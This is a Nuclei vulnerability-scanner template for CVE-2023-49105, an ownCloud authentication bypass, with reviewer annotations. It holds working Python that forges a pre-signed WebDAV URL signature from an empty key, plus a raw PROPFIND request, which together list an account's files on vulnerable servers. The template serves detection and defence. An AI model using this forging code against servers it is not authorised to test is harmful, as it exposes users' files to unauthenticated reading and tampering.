# Nuclei detection template for CVE-2023-49105: checks whether an ownCloud instance
# accepts a WebDAV pre-signed URL although no signing key went into the signature.
id: CVE-2023-49105

info:
  name: OwnCloud - WebDAV API Authentication Bypass
  author: ChristianPoeschl,FlorianDewald,usdAG
  severity: critical
  # Affected range as stated below: owncloud/core from 10.6.0 up to, but not including,
  # 10.13.1. A finding is remediated by upgrading to 10.13.1 or later; see the vendor
  # advisory (first reference) for anything beyond that.
  description: |
    An issue was discovered in ownCloud owncloud/core before 10.13.1. An attacker can access, modify, or delete any file without authentication if the username of a victim is known, and the victim has no signing-key configured. This occurs because pre-signed URLs can be accepted even when no signing-key is configured for the owner of the files. The earliest affected version is 10.6.0.
  # The owncloud.com / owncloud.org entries are vendor pages; the github.com entries are
  # third-party repositories and should be reviewed before anything from them is run.
  reference:
    - https://owncloud.com/security-advisories/webdav-api-authentication-bypass-using-pre-signed-urls/
    - https://github.com/0xfed/ownedcloud
    - https://owncloud.org/security
    - https://github.com/ambionics/owncloud-exploits
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-49105
    cwe-id: CWE-287
    # EPSS values are a snapshot taken when the template was written and drift over time.
    epss-score: 0.21237
    epss-percentile: 0.96302
    # The version field is a wildcard, so this CPE does not encode the affected range
    # given in the description; do not rely on it alone for inventory matching.
    cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: owncloud
    product: owncloud
    shodan-query: title:"owncloud"
  # The `code` tag marks this as a template that executes a local script (see `code:`).
  tags: cve,cve2023,code,owncloud,auth-bypass
# Account name the check is run against. The description says the flaw requires a known
# username whose owner has no signing key configured, and "admin" is only a default
# guess: a negative result for this one name does not show the instance is patched.
variables:
  username: admin
# Local pre-processing step. The Python snippet runs on the host running nuclei, not on
# the target; whatever it prints is what the HTTP step uses as {{code_response}}.
code:
  - engine:
      - py
      - python3 # requires python to be pre-installed on system running nuclei
    # The script reads `username` and `BaseURL` from the environment, assembles the
    # pre-signed query parameters (OC-Expires, OC-Verb, OC-Credential, OC-Date) for
    # /remote.php/dav/files/<username>, derives a 32-byte PBKDF2-HMAC-SHA512 value
    # (10000 iterations) with an empty byte string as the salt argument, i.e. with no
    # per-user key material, and prints the relative URL with that value as OC-Signature.
    # A fixed server has to reject such a signature, which is what the HTTP step observes.
    #
    # NOTE(review): datetime.datetime.now() returns local time, yet the format string
    # appends a literal "Z"; on a scanner that is not running in UTC the OC-Date is off
    # by the local offset. Possible source of false negatives; confirm.
    # NOTE(review): the signed string is built from BaseURL as the scanner sees it, while
    # the request uses the relative path. If a proxy in front of the server presents a
    # different scheme or host, a negative result may not be conclusive; confirm.
    # NOTE(review): `base64` is imported but not used by the snippet, and the commented-out
    # `final_url` line is dead code.
    source: |
      # build signature for presigned urls
      import base64, hashlib, datetime, os
      from urllib.parse import urlencode

      username = os.getenv('username')
      base_url = os.getenv('BaseURL')
      dav_url = f'{base_url}/remote.php/dav/files/{username}'
      oc_date = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%SZ')
      data = {
          'OC-Expires': '991200',
          'OC-Verb': 'PROPFIND',
          'OC-Credential': username,
          'OC-Date': oc_date
      }
      sig_url = f'{dav_url}?{urlencode(data)}'
      # derive signature from empty sign key
      dk = hashlib.pbkdf2_hmac('sha512', sig_url.encode(), b'', 10000, dklen=32)
      final_url = f'/remote.php/dav/files/{username}?{urlencode(data)}&OC-Signature={dk.hex()}'
      #final_url = f'{sig_url}&OC-Signature={dk.hex()}'
      print(final_url)
# Sends a single PROPFIND to the path produced by the code step and classifies the reply.
# For defenders: access-log entries for /remote.php/dav/files/<user> that carry
# OC-Credential and OC-Signature query parameters from unexpected clients are worth
# reviewing on any instance in the affected version range.
http:
  - raw:
      # The Authorization header base64-encodes the bare username, with no ":password"
      # part, so it does not carry a usable Basic credential.
      # NOTE(review): why the header is sent at all is not visible here; confirm.
      - |
        PROPFIND {{code_response}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml
        Authorization: Basic {{base64('{{username}}')}}

    # Either matcher alone reports a finding.
    matchers-condition: or
    matchers:
      # Both conditions must hold: HTTP 207 (WebDAV Multi-Status) and a body containing
      # 'owncloud.org', i.e. the listing for the named account was served without a valid
      # credential. The string is presumably a namespace in the DAV XML; confirm.
      - type: dsl
        name: bypass-correct-user
        dsl:
          - status_code == 207
          - contains(body, 'owncloud.org')
        condition: and

      # All four words must appear in the body. Going by the matcher name, this is the
      # error returned when the signature path was reached but the username does not exist.
      # NOTE(review): no file data is returned in this case, so treat a hit as "needs
      # version check", and confirm that fixed releases do not produce the same error
      # text, which would make this matcher a false-positive source.
      - type: word
        name: bypass-wrong-user
        part: body
        words:
          - User unknown
          - Sabre
          - Exception
          - NotAuthenticated
        condition: and

    # Echoes the template's own `username` variable; nothing is extracted from the
    # response, and the line is emitted for either matcher, including bypass-wrong-user.
    extractors:
      - type: dsl
        dsl:
          - '"Username => "+ username'
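# NOTE(review): the digest below is the signature over the template as published; any change to the template text, including added comments or re-indentation, is expected to invalidate it, so a modified copy has to be re-signed before nuclei will run its code step.
# digest: 490a00463044022036740507180fa43831d3d59a5ccaae05fa1108c27c42a19564fa3f0fc5da439f02205a94a9cbb26731a679d9d39a80c72ff0ff1c48346680963d6aa05f94de9b2e95:922c64590222798bb761d5b6d8e72950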